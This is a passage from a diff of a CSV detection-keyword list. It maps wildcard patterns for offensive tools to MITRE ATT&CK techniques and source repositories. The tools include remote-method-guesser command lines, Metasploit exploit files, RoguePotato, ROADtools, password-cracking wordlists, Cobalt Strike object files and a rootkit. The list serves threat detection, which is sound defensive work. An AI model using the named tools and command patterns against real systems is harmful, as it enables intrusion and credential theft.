Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg bind *127.0.0.1:*--localhost-bypass*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg call * --plugin GenericPrint.jar*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg call * --signature * --bound-name plain-server*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg codebase *http* --component *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg codebase *java.util.HashMap *--bound-name legacy-service*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg enum *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg guess * *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg known javax.management.remote.rmi.RMIServerImpl_Stub*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg listen * CommonsCollections*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg listen 0.0.0.0 *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg objid *[*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg roguejmx *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg scan *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg scan * --ports *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg serial * AnTrinh * --component *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg serial *CommonsCollections*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg-*-jar-with-dependencies.jar*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg*--yso*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*RMIRegistryExploit.java*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*roadrecon plugin *","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","0","N/A","N/A","10","1355","206","2023-10-04T08:58:38Z","2020-03-28T09:56:08Z" +"*roadrecon*gather.py*","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","0","N/A","N/A","10","1355","206","2023-10-04T08:58:38Z","2020-03-28T09:56:08Z" +"*roadrecon.db*","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","1","N/A","N/A","10","1355","206","2023-10-04T08:58:38Z","2020-03-28T09:56:08Z" +"*roadrecon/frontend*","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","1","N/A","N/A","10","1355","206","2023-10-04T08:58:38Z","2020-03-28T09:56:08Z" +"*ROADtools.git*","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","1","N/A","N/A","10","1355","206","2023-10-04T08:58:38Z","2020-03-28T09:56:08Z" +"*ROADtools-master*","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","1","N/A","N/A","10","1355","206","2023-10-04T08:58:38Z","2020-03-28T09:56:08Z" "*roastinthemiddle -i * -t * -u *.txt -g *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*robertdavidgraham/masscan*","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","1","N/A","N/A","10","21683","2981","2023-08-09T13:28:54Z","2013-07-28T05:35:33Z" +"*robertdavidgraham/masscan*","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","1","N/A","N/A","10","21688","2980","2023-08-09T13:28:54Z","2013-07-28T05:35:33Z" "*RobustPentestMacro*","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2282","458","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" "*ROCAVulnerabilityTester*","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A","","N/A","","","" -"*rockyou.txt.gz*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","319","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" +"*rockyou.txt.gz*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" "*rockyou.txt.gz*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*rockyou-30000.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*RogueOxidResolver.cpp*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","876","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" -"*RoguePotato.cpp*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","876","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" -"*RoguePotato.exe*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","876","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" -"*RoguePotato.sln*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","876","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" -"*RoguePotato.zip*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","876","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" -"*RoguePotato-master*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","876","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" +"*rockyou-30000.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*RogueOxidResolver.cpp*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","877","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" +"*RoguePotato.cpp*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","877","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" +"*RoguePotato.exe*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","877","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" +"*RoguePotato.sln*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","877","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" +"*RoguePotato.zip*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","877","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" +"*RoguePotato-master*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","877","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" "*RogueSploit*","offensive_tool_keyword","RogueSploit","RogueSploit is an open source automated script made to create a Fake Acces Point. with dhcpd server. dns spoofing. host redirection. browser_autopwn1 or autopwn2 or beef+mitmf","T1534 - T1565 - T1566 - T1573 - T1590","TA0001 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/h0nus/RogueSploit","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*RogueWinRM dll.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*RogueWinRM exe.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*RogueWinRM.c*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*RogueWinRM dll.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*RogueWinRM exe.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*RogueWinRM.c*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*rookuu/BOFs/*","offensive_tool_keyword","cobaltstrike","Collection of beacon object files for use with Cobalt Strike to facilitate","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rookuu/BOFs","1","1","N/A","10","10","156","26","2021-02-11T10:48:12Z","2021-02-11T10:28:48Z" "*Root backdoor obtained!*","offensive_tool_keyword","POC","This is a PoC for Nimbuspwn a Linux privilege escalation issue identified by Microsoft as originally described in https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/ (CVE-2022-29799 and CVE-2022-29800)","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/Immersive-Labs-Sec/nimbuspwn","1","0","N/A","N/A","1","21","5","2022-05-05T10:02:27Z","2022-04-27T13:04:33Z" "*root\cimv2:Win32_Implant*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" -"*root_userpass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*Rootkit.cpp*","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","8","742","176","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" -"*root-shellcode-linux*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*root_userpass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Rootkit.cpp*","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1550 T1555 T1212 